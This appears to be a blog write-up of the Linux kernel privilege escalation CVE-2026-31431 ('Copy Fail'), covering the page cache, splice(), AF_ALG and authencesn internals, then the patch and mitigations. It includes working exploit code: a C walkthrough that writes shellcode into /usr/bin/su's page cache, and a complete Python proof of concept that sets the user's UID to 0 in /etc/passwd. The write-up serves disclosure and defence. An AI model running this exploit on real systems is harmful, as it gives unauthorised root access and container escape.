CVE-2026-31431: Copy Fail

2026-05-03

On April 29, 2026, Theori publicly disclosed Copy Fail (CVE-2026-31431), a local privilege escalation affecting every major Linux distribution shipped since 2017. A logic flaw in the kernel’s authencesn cryptographic template, chained through AF_ALG sockets and splice(), gives an unprivileged user a deterministic 4-byte write into the page cache of any readable file. A 732-byte Python script corrupts /usr/bin/su in memory and pops a root shell. No race, no offsets, no compilation.

When I first read the Xint writeup I immediately thought of Dirty COW (CVE-2016-5341), another page cache corruption bug that gave root on everything. But the mechanics are completely different. Dirty COW was a race condition in the copy-on-write fault handler. Two threads racing madvise(MADV_DONTNEED) against a write fault could sneak a write into a read-only mapping. Copy Fail has no race at all, just a deterministic sequence of syscalls that any unprivileged user can call. Dirty COW wrote through the virtual memory subsystem, which at least understands page permissions. Copy Fail writes through the crypto subsystem, which has no concept of page ownership. It just sees a scatterlist entry and writes to it.

I also thought this was an out-of-bounds write at first (when I saw “writes 4 bytes past the ciphertext boundary”). It’s not. We’ll get to why, and it’s the reason KASAN never caught it in eight years.

The Xint writeup is well done but moves fast through kernel internals. Here we go slower, covering page cache, scatterlists, splice() and AF_ALG/AEAD so you can follow the full chain even if you’ve never touched kernel MM code. All credits for the discovery go to Taeyang Lee, Theori and the Xint Code Research Team

The Page Cache

Every time we read() a file, the kernel doesn’t go to disk. It goes to the page cache - a system-wide in-memory cache of file data, organized by (inode, offset) pairs. If the page is already cached from a previous read (by any process), the kernel returns it directly. If not, it reads from disk, caches it, then returns it.

   container 1          container 2        host
  +-----------+       +-----------+       +-----------+
  | Process A |       | Process B |       | Process C |
  |  read()   |       |  execve() |       |  mmap()   |
  +-----+-----+       +-----+-----+       +-----+-----+
        |                   |                   |
        +-------------------+-------------------+
                            |
                            v
   +---------------------------------------------------------+
   |                    Page Cache  (RAM)                    |
   |                                                         |
   |    /usr/bin/su   +--------+--------+--------+           |
   |                  | page 0 | page 1 | page 2 |           |
   |                  |  ELF   | .text  | .data  |           |
   |                  +--------+--------+--------+           |
   +---------------------------+-----------------------------+
                               ^
                         miss  |  populate
                               v
                        +-------------+
                        |    disk     |
                        | /usr/bin/su |
                        +-------------+

Two structures matter here:

struct page: represents a single physical page (usually 4096 bytes). Has flags, a mapping pointer (back to the file’s address_space), and an index (the page’s offset within the file in page-sized units).
struct address_space: associated with an inode. It’s the page cache index for a specific file, a radix tree mapping page offsets to struct page pointers.

The critical property for this vulnerability are the page cache is shared across the entire system. If two processes in different containers, cgroups and user namespaces read the same file on the same filesystem, they will share the same physical pages. Corrupt a Page Cache page (yeah, this is how we refer it, page page page…) and all reader sees the corrupted state.

One more thing. The page cache tracks whether a page has been modified (the “dirty” bit). When a page is dirtied through the normal write path (write(), mmap store), the kernel marks it dirty and eventually writes it back to disk. But the corruption we’re about to see doesn’t go through the normal write path. The page is never marked dirty and the file on disk is untouched, but every process that reads it gets the corrupted in-memory version.

Scatterlists

The kernel often needs to describe buffers that span multiple non-contiguous physical pages. A read() might return data from pages scattered across physical memory. Crypto operations need to process input spread across different allocations. The scatterlist is the kernel’s way to represent these discontiguous buffers.

A single struct scatterlist entry describes one contiguous chunk:

struct scatterlist {
    unsigned long   page_link;  // struct page* | flags in low 2 bits
    unsigned int    offset;     // byte offset within the page
    unsigned int    length;     // byte length of this chunk
    dma_addr_t      dma_address;
};

The page_link field is overloaded. The low 2 bits encode flags:

Bit 0 (SG_CHAIN): this entry it’s a pointer to the next scatterlist array. This is how multiple SG (scatter-gather (kernel devs love their two-letter abbreviations, sg, sk, mm, vm)) arrays get chained together.
Bit 1 (SG_END): this is the last entry in the chain.

The upper bits (after masking off the low 2) store the struct page* pointer.

A chain of scatterlists looks like this:

  SG Array 1                        SG Array 2
  +-------------------------+       +-------------------------+
  | sg[0]: page_A off=0     |       | sg[0]: page_C off=128   |
  |        len=4096         |       |        len=64   [END]   |
  +-------------------------+       +-------------------------+
  | sg[1]: page_B off=0     |                ^
  |        len=512          |                |
  +-------------------------+                |
  | sg[2]: CHAIN            |----------------+
  +-------------------------+

sg_chain() is the function that creates these links, it sets the SG_CHAIN bit on the last entry of one array and points it at the first entry of the next.

To actually read or write data at a byte offset within a scatterlist chain, the kernel provides scatterwalk_map_and_copy(). It walks the chain entry by entry, skipping pages until it reaches the target offset, then copies data in or out. This function is the one that ultimately performs the 4-byte page cache write in this vulnerability.

`splice()`: Zero-Copy I/O

The splice() system call moves data between a file descriptor and a pipe without copying through userspace. Instead of read()-ing file data into a userspace buffer and then write()-ing it to another fd, splice() passes page references. The pipe holds pointers to the same physical pages that live in the page cache.

  splice(file_fd, pipe_wr)          splice(pipe_rd, socket_fd)

  +----------+    +----------+    +----------+
  |   File   |--->|   Pipe   |--->|  Socket  |
  | (on disk)|    | (in mem) |    | (AF_ALG) |
  +----------+    +----------+    +----------+
       |               |               |
       '---------------'               |
       same physical pages         kernel crypto
       (page cache pages)         receives page cache
                                  page refs in its
                                  scatterlist

When we splice() a file into a pipe, the pipe’s internal buffer doesn’t get a copy of the data. It gets references to the page cache pages themselves. Then when we splice() from the pipe into a socket, the socket’s internal buffers (scatterlists, in the case of AF_ALG) receive those same page cache page references. No copy at any step. The kernel’s crypto subsystem is now holding direct pointers to page cache pages of the file we spliced.

Without splice(), the crypto subsystem would operate on copied buffers. With splice(), it operates on the page cache itself. Dirty COW used the same trick of passing page references around without copying. That one went through the VM fault handler instead of splice().

AF_ALG and AEAD

AF_ALG is a Linux socket family that exposes the kernel’s cryptographic API to unprivileged userspace. Any user can:

int alg_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);  // AF_ALG = 38
struct sockaddr_alg sa = {                         // include/uapi/linux/if_alg.h:19
    .salg_family = AF_ALG,
    .salg_type   = "aead",
    .salg_name   = "authencesn(hmac(sha256),cbc(aes))"
};
bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa));

No privileges required. No CAP_NET_ADMIN. The module auto-loads on first use. AF_ALG was designed so userspace applications could use hardware-accelerated crypto without writing kernel modules. Convenient for us too.

AEAD (Authenticated Encryption with Associated Data) is a class of crypto algorithms that provides both confidentiality (encryption) and integrity (authentication tag). The input to an AEAD decryption looks like:

  +---------------+--------------------+------------------+
  | AAD           | Ciphertext         | Authentication   |
  | (auth'd only) | (decrypted+auth'd) | Tag (verified)   |
  +---------------+--------------------+------------------+

The AAD (Associated Data) is authenticated but not encrypted. It’s plaintext metadata that must not be tampered with. The ciphertext gets decrypted. The authentication tag is verified against both the AAD and ciphertext to detect tampering.

`authencesn`

authencesn is a specific AEAD template used for IPsec ESP with Extended Sequence Numbers (RFC 4303).

Every IPsec packet carries a sequence number to prevent replay attacks. Originally this was a 32-bit counter, but at 10 Gbps a 32-bit counter wraps in under 2 seconds. RFC 4303 introduced Extended Sequence Numbers (ESN), a 64-bit counter split into two halves:

  Full 64-bit ESN: [ seqno_hi (32 bits) | seqno_lo (32 bits) ]
                     upper 32 bits        lower 32 bits

Only seqno_lo goes on the wire in the ESP header. The sender and receiver both maintain a shared counter (the Security Association state), so seqno_hi is implicit - both sides know it. This saves 4 bytes per packet on the wire while still getting a 64-bit anti-replay window.

The authentication hash needs to cover the full 64-bit sequence number, including the high bits that aren’t in the packet. So the kernel has to reconstruct the full ESN before computing the HMAC. In the real IPsec path (esp_input_set_header()), the ESP code takes the implicit seqno_hi from the SA (Security Association) state, pushes the skb header back by 4 bytes, and stuffs seqno_hi into the AAD before passing it to authencesn:

  ESP header on the wire:     [  SPI  |  seqno_lo  | IV | ciphertext | tag ]
                                                ^
                                                | only 32 bits

  AAD reconstructed for HMAC: [  seqno_hi  |  seqno_lo  |  SPI  ]
                                 bytes 0-3    bytes 4-7    bytes 8-11
                                 (from SA)    (from wire)  (from wire)

Now authencesn has the full 64-bit ESN in the first 8 bytes of the AAD. But the HMAC spec for ESP says the hash should be computed over [SPI | seqno_lo | seqno_hi | ciphertext] - a different byte order. So authencesn needs to rearrange these bytes before hashing. It does this by treating the caller’s destination buffer as scratch space.

In crypto_authenc_esn_decrypt(), three scatterwalk_map_and_copy() calls perform the shuffle (source):

  Step 1: read  tmp[0..1] = dst[0..7]          -- grab seqno_hi and seqno_lo
  Step 2: write dst[4..7] = tmp[0] (seqno_hi)  -- move seqno_hi to bytes 4-7
  Step 3: write dst[assoclen+cryptlen] = tmp[1] -- stash seqno_lo PAST the ciphertext

In the normal IPsec decrypt path, dst[assoclen + cryptlen] points to the authentication tag, the HMAC bytes right after the ciphertext in the AEAD buffer. The tag region is part of the same kernel-allocated skb buffer, fully writable, about to be overwritten with the computed HMAC anyway. Stashing seqno_lo there temporarily is harmless. It’s scratch space that will be consumed by the HMAC comparison and then discarded:

  Normal IPsec dst buffer (single skb allocation):

  +----------+--------------+----------+
  |   AAD    |  ciphertext  |   tag    |  <-- all one contiguous kernel buffer
  +----------+--------------+----------+
  |                         |          |
  | assoclen |   cryptlen   | authsize |
  |                         ^
  |              dst[assoclen+cryptlen]
  |              = start of tag region
  |              safe to use as scratch

After the HMAC, crypto_authenc_esn_decrypt_tail() restores the original layout. It reads seqno_lo back from dst[assoclen+cryptlen] and writes the original 8 bytes back to dst[0..7]. Clean round-trip, no side effects.

All of this assumes dst is a private, writable buffer - that dst[assoclen + cryptlen] is safe to write to because it’s just the tag region of a kernel-owned crypto buffer. That breaks when someone chains page cache pages into the destination scatterlist at that exact offset.

The Bug

The 2017 In-Place Optimization

In 2017, commit 72548b093ee3 added an optimization to algif_aead.c - the AF_ALG AEAD interface. The idea was simple. For decryption, instead of using separate input and output scatterlists, operate in-place by pointing both req->src and req->dst to the same scatterlist. This avoids an allocation and a copy. Makes sense as a performance win.

The AF_ALG socket works like a network socket. Userspace transmits data into the kernel (sendmsg/splice) and receives results back (recvmsg). The kernel uses networking terminology for the two sides:

TX SGL (transmit scatterlist): holds the data sent into the socket by userspace. This is the input to the crypto operation - the AAD, ciphertext, and tag. When data arrives via splice(), these scatterlist entries point directly to page cache pages.
RX SGL (receive scatterlist): the buffer where the kernel writes the crypto result back to userspace. This is allocated from the recvmsg() side - normal kernel memory, not page cache.

The implementation in _aead_recvmsg():

Copy the AAD and ciphertext from the TX SGL into the RX SGL.
Chain the remaining tag pages from the TX SGL into the RX SGL using sg_chain().
Set req->src = req->dst - both source and destination now point to the same combined scatterlist.

When the data came through splice(), the TX SGL holds page cache pages. After chaining, those page cache pages are now part of the destination scatterlist:

req->src --+
           |
           v
req->dst --> RX Buffer (user memory)          TX SGL (page cache pages)
             +----------+----------+          +----------------------+
             |   AAD    |    CT    |--chain-->|  Tag pages           |
             | (copied) | (copied) |          |  (Page Cache pages!) |
             +----------+----------+          +----------------------+
             <--- user memory ---->           <-- still page cache! ->

The boundary between “safe to write” (user memory in the RX buffer) and “must not write” (page cache pages from splice) is now just an offset within the same scatterlist chain. Any write that walks past the AAD + ciphertext region crosses into page cache territory.

Why Only `authencesn` Triggers This

The in-place optimization has been there since 2017, and every AEAD algorithm in the kernel uses the same dst scatterlist. So why doesn’t every decrypt operation corrupt the page cache?

To answer that, let’s trace what actually writes to dst during a normal AEAD decrypt. There are three subsystems involved, and each one stays inside the safe boundary:

1. The HMAC engine (crypto_ahash_digest())

The HMAC computation reads from dst to hash the AAD and ciphertext. It writes the computed hash into a separate kernel buffer (areq_ctx->tail), not back into dst. The hash output goes into a small buffer allocated as part of the request context. Even though the HMAC reads across the full [0 .. assoclen+cryptlen] range of dst, it never writes a single byte to it.

2. The cipher engine (crypto_skcipher_decrypt())

The actual AES-CBC (or whatever cipher is configured) decryption writes plaintext to dst, but only within the ciphertext region, dst[assoclen .. assoclen+cryptlen-authsize]. You can see the range in authenc.c line 254-255, skcipher_request_set_crypt(skreq, src, dst, req->cryptlen - authsize, req->iv). This region was copied from the TX SGL into the RX buffer. Safe user memory.

3. Tag verification (crypto_authenc_decrypt_tail())

To verify the authentication tag, the kernel reads the tag from req->src (line 240: scatterwalk_map_and_copy(ihash, req->src, ...)). It reads from req->src, not req->dst. Even with the in-place optimization where src == dst, this is a read operation (the last argument to scatterwalk_map_and_copy is 0 = read). The tag bytes are read into ihash (a local buffer), compared with the computed HMAC via crypto_memneq, and discarded. The tag region of dst is never written to.

  Normal AEAD decrypt - who writes where in dst:

  +------- RX buffer (user memory) -------+-- chained page cache --+
  |   AAD        |   ciphertext           |   tag pages            |
  +--------------+------------------------+------------------------+
      |              |                    |
   HMAC reads     cipher WRITES         tag READ from src
   (no writes)    plaintext here        into local buffer
                  (RX buffer, safe)     (never written to dst)

The regular authenc (non-ESN) also writes to dst[assoclen + cryptlen], but only during encryption (crypto_authenc_genicv(), line 154), where it copies the computed HMAC tag into the output buffer. That’s the encrypt path, not decrypt. The in-place optimization with sg_chain only applies to the decrypt path in _aead_recvmsg(). The encrypt path uses a different SGL layout where the RX buffer is large enough to hold AAD + plaintext + tag, so no page cache pages are chained.

authencesn is the exception. The ESN byte rearrangement is specific to IPsec Extended Sequence Numbers and no other AEAD algorithm needs it. That rearrangement uses dst as scratch space, and step 3 writes 4 bytes at dst[assoclen + cryptlen] during the decrypt path. Without the ESN shuffle, the in-place optimization would be harmless. No subsystem in the normal decrypt pipeline ever writes to the tag region of dst.

The bug went unnoticed for eight years. The in-place optimization was tested with authenc, gcm, ccm, and other AEAD algorithms - all of which only read the tag region during decrypt. authencesn was the only algorithm that wrote past the boundary, and nobody connected the two code paths.

The 4-Byte Write

Now the two pieces collide. With the in-place optimization, dst is the combined RX+chained scatterlist - user memory for AAD and ciphertext, then page cache pages for the tag region.

Let’s be concrete about assoclen and cryptlen. These are the two parameters that define the AEAD buffer layout:

assoclen (associated data length): how many bytes of AAD precede the ciphertext. Set by the attacker via the ALG_SET_AEAD_ASSOCLEN cmsg in sendmsg(). In the PoC this is 8 (for the 8-byte ESN AAD).
cryptlen (ciphertext length): how many bytes of ciphertext follow the AAD. This is the used parameter in aead_request_set_crypt(). It comes from how much data was sent via sendmsg() + splice(), minus assoclen.

Together they map out the dst scatterlist:

byte offset:
       0               assoclen    assoclen+cryptlen
       |                  |                |
       v                  v                v
  dst: [    AAD (8 bytes) |  ciphertext    |  tag ...  ]
       +------------------+----------------+------...--+
       |<--- assoclen --->|<-- cryptlen -->|
       |                                   |
       +---- RX buffer (user memory) ------+-- chained page cache --+

assoclen + cryptlen is the byte offset where the ciphertext ends and the authentication tag begins. In normal operation, that’s where the tag lives - safe crypto buffer memory. But with the in-place optimization, everything past the RX buffer boundary is page cache pages chained from the TX SGL via sg_chain(). The offset assoclen + cryptlen lands right there.

The authencesn ESN shuffle writes seqno_lo at exactly dst[assoclen + cryptlen] (step 3 above). That offset walks past the AAD and ciphertext - which live in user memory - and lands in the chained tag pages, which are page cache pages from splice:

  dst scatterlist (in-place):

  +------ RX buffer (user memory) ------+---- chained TX SGL (page cache) ----+
  |  AAD (8 bytes) | ciphertext (N)     |  tag pages from splice              |
  +---------+------+--------------------+-----+--------------------------------+
            |                                 |
   step 2 writes here (safe)       step 3 writes here (Page Cache!)
   dst[4..7] = seqno_hi            dst[assoclen+cryptlen] = seqno_lo

Why exactly 4 bytes? Because seqno_lo is the low 32 bits of the 64-bit ESN. 32 bits = 4 bytes. The size of the scratch write is fixed by the IPsec ESN format.

Why This Is Not an Out-of-Bounds Write

When I first read the Xint writeup - “writes 4 bytes past the ciphertext boundary” - I immediately classified this as an OOB write in my head. Writing past a boundary? Classic heap overflow, right?

The write at dst[assoclen + cryptlen] is within bounds of the dst scatterlist. The scatterlist has valid entries at that offset, the chained tag pages. scatterwalk_map_and_copy walks the chain, finds a valid struct scatterlist entry with a valid struct page pointer and a valid length, maps the page, writes to it. No bounds check fails. No memory corruption in the heap sense. No KASAN splat. Everything is “correct”.

The bug is about ownership, not size. The scatterlist is the right length. The page at that offset is a real, mapped, valid page. But the page belongs to the page cache, it’s a cached copy of an on-disk file, and authencesn treats it as a private scratch buffer. In the normal IPsec path, that offset points to a kernel-allocated skb page that nobody cares about. With the in-place optimization and splice(), the same offset now points to a page cache page that was chained in via sg_chain().

No buffer overflow. No use-after-free. No type confusion. The write is architecturally correct. It just writes to a page that was never supposed to be in that scatterlist position. A logic bug about which pages end up in dst, not about how many bytes get written. Dirty COW was invisible to memory sanitizers for the same reason. The write targets a valid page, just the wrong page. The kernel’s memory safety tools check sizes and lifetimes, not ownership.

What does the attacker control?

The value written: tmp[1] is seqno_lo, bytes 4-7 of the AAD. The attacker provides the AAD via sendmsg(). They choose every byte.
The target file: any file readable by the current user (opened read-only, then splice()-d).
The target offset: determined by the file offset passed to splice() and the assoclen/cryptlen parameters.

And the write happens before HMAC verification. crypto_authenc_esn_decrypt() rearranges the ESN first (line 293-295), then computes the HMAC (line 305), then checks it in decrypt_tail(). The HMAC will fail (the ciphertext is attacker-controlled garbage) and recvmsg() returns an error. But the 4-byte write into the page cache is already done.

The Exploit

PoC Walkthrough

The public PoC is a 732-byte obfuscated Python script. To make the syscall flow easier to follow, here’s the same logic as readable C. There’s also a full C port by @tgies.

Step 1: Open the AF_ALG socket and bind authencesn

int alg_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);

struct sockaddr_alg sa = {
    .salg_family = AF_ALG,
    .salg_type   = "aead",
    .salg_name   = "authencesn(hmac(sha256),cbc(aes))"
};
bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa));

This creates an AF_ALG socket and binds it to the authencesn AEAD template. No privileges needed, the kernel auto-loads algif_aead and authencesn on first use.

Step 2: Configure the crypto parameters

// AES-128 key, value doesn't matter, HMAC will fail anyway
uint8_t key[40] = { 0x08, 0x00, 0x01, 0x00, [4 ... 7] = 0x00, [8 ... 11] = 0x10 };
setsockopt(alg_fd, SOL_ALG, ALG_SET_KEY, key, sizeof(key));

// Authentication tag size = 4 bytes
setsockopt(alg_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, 4);

// accept() gives us the request file descriptor
int req_fd = accept(alg_fd, NULL, NULL);

SOL_ALG = 279. ALG_SET_KEY = 1. ALG_SET_AEAD_AUTHSIZE = 5. The key value is irrelevant, the HMAC computation will fail regardless, and the page cache corruption happens before verification.

Step 3: The write4 primitive, one 4-byte page cache write

This is the core of the exploit. Each call overwrites 4 bytes at a chosen offset in the target file’s page cache:

void write4(int req_fd, int target_fd, off_t offset, uint8_t value[4])
{
    // Build the AAD: 4 garbage bytes + the 4 bytes we want to write.
    // Bytes 4-7 become seqno_lo in authencesn, the value that gets
    // written to dst[assoclen+cryptlen], which is our page cache page.
    uint8_t aad[8] = { 'A','A','A','A', value[0], value[1], value[2], value[3] };

    // cmsg headers tell the kernel: decrypt mode, IV, assoclen = 8
    struct cmsghdr cmsg_iv, cmsg_op, cmsg_assoclen;
    // ALG_SET_IV:            16 zero bytes (AES block size)
    // ALG_SET_OP:            ALG_OP_DECRYPT
    // ALG_SET_AEAD_ASSOCLEN: 8 (our AAD is 8 bytes)

    struct msghdr msg = { /* iov = aad, cmsg = above */ };
    sendmsg(req_fd, &msg, MSG_MORE);   // send AAD, flag more data coming

    // Now splice the target file's page cache pages into the crypto socket.
    // This is where the page cache pages enter the TX SGL by reference.
    int pipefd[2];
    pipe(pipefd);

    loff_t file_off = 0;
    splice(target_fd, &file_off, pipefd[1], NULL, offset + 4, 0);
    splice(pipefd[0], NULL, req_fd, NULL, offset + 4, 0);

    // recv() triggers the AEAD decrypt in the kernel.
    // authencesn rearranges ESN bytes -> writes seqno_lo to page cache.
    // HMAC fails -> recv returns error, but the 4 bytes are already written.
    char buf[4096];
    recv(req_fd, buf, sizeof(buf), 0);   // error expected, we don't care

    close(pipefd[0]);
    close(pipefd[1]);
}

The sendmsg with MSG_MORE sends the AAD (8 bytes) and tells the kernel “more data is coming”. The two splice calls then feed the target file’s page cache pages into the socket as ciphertext + tag. When recv triggers the decrypt, authencesn writes aad[4..7] at dst[assoclen + cryptlen], which is a page cache page of the target file.

Step 4: Overwrite the target binary, 4 bytes at a time

int target = open("/usr/bin/su", O_RDONLY);

// payload[] is a small ELF shellcode that calls setuid(0) + execve("/bin/sh")
for (int i = 0; i < payload_len; i += 4) {
    write4(req_fd, target, i, &payload[i]);
}

// The page cache of /usr/bin/su now contains our shellcode.
// Execute it - the kernel loads from the corrupted page cache.
execve("/usr/bin/su", (char*[]){ "su", NULL }, NULL);
// we are root

Each write4 call corrupts 4 bytes of /usr/bin/su’s page cache. After payload_len / 4 iterations, the binary’s in-memory image has been rewritten. execve loads it from the corrupted cache, not from disk. The shellcode runs as root. Profit! :D

Why It Crosses Containers

The page cache is per-filesystem, not per-namespace. A container that mounts the host’s root filesystem (or shares a layer with it) uses the same physical page cache pages as the host. Corrupt /usr/bin/su’s page cache from inside a container, and the host’s su is corrupted too. Container escape for free.

The `chmod 4711` Non-Fix

After the disclosure, a “mitigation” started circulating on social media:

for b in passwd chsh chfn mount sudo pkexec; do
    p=$(readlink -f "$(command -v "$b")")
    [ -n "$p" ] && [ "$(stat -c %a "$p")" != "4711" ] && chmod 4711 "$p"
done

It removes the read permission from setuid binaries (rwx--x--x instead of rwsr-xr-x), so unprivileged users can’t open() them for reading, and therefore can’t splice() their page cache pages.

This does not work. The vulnerability is a 4-byte write into the page cache of any readable file, not just setuid binaries. The original PoC targets /usr/bin/su because it’s a convenient setuid binary to corrupt and execute. But the primitive is far more general. As long as you can open(path, O_RDONLY) a file, you can corrupt its page cache.

/etc/passwd is the obvious alternative target. World-readable on every Linux system because ls -l, id, ps, and every program that maps UIDs to names reads it. The format is trivial, each line is username:x:uid:gid:.... Overwriting your user’s UID field from 1000 to 0000 in the page cache makes the system believe you are root.

I wrote a minimal PoC that does exactly this. Instead of corrupting a setuid binary, it overwrites the UID field of the attacker’s /etc/passwd entry:

#!/usr/bin/env python3
## Tested on kernel 6.12.10.
import os, socket, struct

TARGET = "/etc/passwd"
USER   = os.environ.get("USER", "user")

with open(TARGET, "rb") as f:
    data = f.read()
# Find the line for our user: "user:x:1000:1000:..."
# The UID is the third field (after the second ':')
prefix = f"{USER}:x:".encode()
idx = data.find(prefix)
uid_offset = idx + len(prefix)
old_uid = data[uid_offset:uid_offset+4]

ALG_SOCK  = 38   # AF_ALG
SOL_ALG   = 279
ALG_SET_KEY           = 1
ALG_SET_IV            = 2
ALG_SET_OP            = 3
ALG_SET_AEAD_ASSOCLEN = 4
ALG_SET_AEAD_AUTHSIZE = 5

alg = socket.socket(ALG_SOCK, socket.SOCK_SEQPACKET, 0)
alg.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))

# Key format: rtattr header + crypto_authenc_key_param + authkey + enckey
# rtattr { rta_len=8, rta_type=CRYPTO_AUTHENC_KEYA_PARAM(1) }
# crypto_authenc_key_param { enckeylen=16 (AES-128, big-endian) }
# then: 16 bytes HMAC-SHA256 key + 16 bytes AES key (all zeros, value irrelevant)
key = bytes.fromhex('0800010000000010' + '0' * 64)
alg.setsockopt(SOL_ALG, ALG_SET_KEY, key)
alg.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)

req, _ = alg.accept()
def write4(fd, offset, value_4bytes):
    aad = b"AAAA" + value_4bytes  # bytes 4-7 of AAD = seqno_lo = the written value
    iv_data  = b'\x10' + b'\x00' * 19
    op_data  = b'\x00' * 4
    assoc    = struct.pack("I", 8)
    req.sendmsg(
        [aad],
        [
            (SOL_ALG, ALG_SET_IV, iv_data),
            (SOL_ALG, ALG_SET_OP, op_data),
            (SOL_ALG, ALG_SET_AEAD_ASSOCLEN, assoc),
        ],
        socket.MSG_MORE
    )

    splice_len = offset + 4
    r, w = os.pipe()
    os.splice(fd, w, splice_len, offset_src=0)
    os.splice(r, req.fileno(), splice_len)
    try:
        req.recv(8 + offset)
    except OSError:
        pass
    os.close(r)
    os.close(w)

target_fd = os.open(TARGET, os.O_RDONLY)
new_uid = b"0000"

write4(target_fd, uid_offset, new_uid)
os.close(target_fd)
import pwd
info = pwd.getpwnam(USER)
if info.pw_uid == 0:
    print(f"[+] '{USER}' is now UID 0 in the page cache, just run `su - {USER}`")
else:
    print(f"[-] UID is {info.pw_uid}, expected 0")

The attack flow is different from the setuid approach but equally effective:

Corrupt /etc/passwd in the page cache, changing user:x:1000: to user:x:0000:
Run su - user and enter user’s own password
PAM authenticates against /etc/shadow (untouched, password is valid)
After authentication, su calls setuid(getpwnam("user").pw_uid)
getpwnam reads /etc/passwd from the corrupted page cache and returns UID 0
setuid(0) - root shell

No setuid binary was corrupted. No read permission on any setuid binary was needed. The target was a world-readable text file. The chmod 4711 “mitigation” changes nothing.

Patch the kernel, disable algif_aead module loading, or block AF_ALG socket creation via seccomp. chmod doesn’t help.

The Patch

Commit a664bf3d603d reverts the 2017 in-place optimization. The fix is conceptually simple. Keep source and destination as separate scatterlists.

Before (vulnerable) - algif_aead.c:282:

// src and dst point to the same scatterlist (in-place)
aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
                        areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);

Page cache pages from the TX SGL are chained into the shared src/dst via sg_chain(). The authencesn scratch write lands on them.

After (fixed):

// src and dst are separate scatterlists (out-of-place)
aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
                        areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);

req->src now points to the TX SGL (which may contain page cache pages from splice). req->dst points to the RX SGL, a separately allocated buffer for the user’s recvmsg(). The authencesn scratch write at dst[assoclen + cryptlen] now hits the RX buffer (harmless user memory), not page cache pages. The sg_chain() linking page cache tag pages into a writable destination is gone.

The commit message:

crypto: algif_aead - Revert to operating out-of-place

This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings.

Eight years of silent exposure, fixed by removing a performance optimization that had no meaningful benefit. Hmm.

Mitigation

If you can’t patch immediately, block AF_ALG socket creation:

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null || true

This does not affect dm-crypt/LUKS, kTLS, IPsec/XFRM, OpenSSL, GnuTLS, SSH, or any in-kernel crypto user. Those go through the kernel crypto API directly without AF_ALG. For containers and CI systems, also block AF_ALG socket creation via seccomp.

References

If you’ve got questions, feel free to hit me up on Twitter!